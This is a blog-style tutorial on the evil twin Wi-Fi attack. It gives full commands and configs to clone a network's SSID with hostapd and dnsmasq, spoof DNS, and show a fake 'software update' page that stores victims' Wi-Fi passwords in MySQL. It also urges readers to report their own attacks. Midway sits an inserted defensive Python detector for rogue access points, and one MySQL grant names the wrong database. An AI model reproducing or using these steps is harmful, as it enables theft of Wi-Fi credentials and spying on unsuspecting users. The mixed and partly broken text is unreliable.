The evil twin is a very powerful attack used by many hackers to gain access to other people's Wi-Fi.

An evil twin attack can be performed easily; instead of writing scripts or using programs such as Fluxion, this method can come in handy.

Creating a fake access point can be useful in many scenarios.

With it we can monitor and spy on connected users, steal the credentials and passwords they enter, and steal Wi-Fi passwords without using a dictionary, even if the network is WPA or WPA2.

The same method can be used to start a normal fake AP or honeypot for other uses.

A quick definition of an evil twin attack: an attack in which a hacker sets up a fake Wi-Fi network that looks like a legitimate access point in order to steal victims' sensitive details.

Most often, the victims of such attacks are ordinary people with limited knowledge about security.

When the victim connects to our fake access point, we display a page asking for a software update. The victim has to enter the password and click enter, and the password is stored in our database management system, which is MySQL.

For displaying the page you can download templates using Google.

"An evil twin attack can be done in a number of ways."

Let's see what steps are involved in this attack.

step1:- start a fake access point with the same name as the target network.

step2:- disconnect a client.

step3:- wait for them to connect to the fake access point.

step4:- once they connect, automatically display a page asking for the network key.

Let's get into the process,

# --- Preparing ---:


apt-get update


apt-get install hostapd dnsmasq apache2 


airmon-ng start wlan0


mkdir ~/fap


cd ~/fap


nano hostapd.conf 


 # Instructions for hostapd.conf: 


interface=[INTERFACE NAME]

driver=nl80211

ssid=[WiFi NAME]

hw_mode=g

channel=8

macaddr_acl=0

ignore_broadcast_ssid=0


nano dnsmasq.conf


 # Instructions for dnsmasq.conf: 


interface=[INTERFACE NAME]

dhcp-range=192.168.1.2, 192.168.1.30, 255.255.255.0, 12h

dhcp-option=3, 192.168.1.1

dhcp-option=6, 192.168.1.1

server=8.8.8.8

log-queries

log-dhcp

listen-address=127.0.0.1


 # Routing table and gateway:


ifconfig wlan0mon up 192.168.1.1 netmask 255.255.255.0

route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1


 # Internet access:


iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE

iptables --append FORWARD --in-interface wlan0mon -j ACCEPT

echo 1 > /proc/sys/net/ipv4/ip_forward


 # mysql database:

service mysql start

mysql

create database fap;


create user fapuser;


grant all on rogueap.* to 'fapuser'@'localhost' identified by 'fappassword';


use fap;


create table wpa_keys(password1 varchar(40), password2 varchar(40));

ALTER DATABASE fap CHARACTER SET 'utf8';


select * from wpa_keys;

# Captive portal setup:

rm -rf /var/www/html/*

mv ~/Downloads/fap.zip /var/www/html

cd /var/www/html

unzip fap.zip 

service apache2 start


 # --- Starting the attack ---: 


hostapd hostapd.conf


dnsmasq -C dnsmasq.conf -d


dnsspoof -i wlan0mon
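
Seen from the defender's side, the hostapd.conf above sets no WPA options, so the fake access point advertises the target's SSID as an open network, normally from a BSSID that is not in the site's inventory. The following is an added example, not part of the original post, that flags such access points in scan results; the `AP` record, the `KNOWN` inventory, the SSID `CorpWiFi` and all BSSIDs are constructed assumptions.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class AP:
    ssid: str
    bssid: str
    channel: int
    security: str  # "open", "wpa2", ...

def norm(ssid):
    # Treat look-alike names (case, stray spaces) as the same SSID.
    return ssid.strip().casefold()

# Assumption: inventory of legitimate access points (constructed values).
KNOWN = {
    norm("CorpWiFi"): {
        "bssids": {"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"},
        "security": "wpa2",
    },
}

def find_evil_twins(scan, known=KNOWN):
    """Return (AP, reasons) for each AP reusing a known SSID but not matching inventory."""
    findings = []
    for ap in scan:
        profile = known.get(norm(ap.ssid))
        if profile is None:
            continue  # not one of our SSIDs
        reasons = []
        if ap.bssid.lower() not in profile["bssids"]:
            reasons.append("unknown BSSID")
        if ap.security.lower() != profile["security"]:
            reasons.append("security changed to " + ap.security.lower())
        if reasons:
            findings.append((ap, reasons))
    return findings

# Constructed scan results for illustration.
SCAN = [
    AP("CorpWiFi", "aa:bb:cc:00:00:01", 6, "wpa2"),    # legitimate
    AP("CorpWiFi", "AA:BB:CC:00:00:02", 11, "wpa2"),   # legitimate, upper-case MAC
    AP("CorpWiFi", "de:ad:be:ef:00:10", 8, "open"),    # open twin, unknown radio
    AP("CorpWiFi", "aa:bb:cc:00:00:01", 6, "open"),    # cloned BSSID, still open
    AP("corpwifi ", "de:ad:be:ef:00:11", 8, "wpa2"),   # look-alike name
    AP("CoffeeShop", "11:22:33:44:55:66", 1, "open"),  # unrelated network
]

if __name__ == "__main__":
    for ap, reasons in find_evil_twins(SCAN):
        print(f"ALERT {ap.ssid!r} {ap.bssid} ch{ap.channel}: {', '.join(reasons)}")
```

The security comparison still catches a twin that clones a legitimate BSSID, because the configuration shown on this page cannot offer the WPA2 handshake the real network uses.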

A number of people fall for this attack, and that's it for today. Comment below how you performed this attack.

Thank you for reading our blog.

Hope you're enjoying our content, and share our blog.

credits:-

spidyboy dark rider.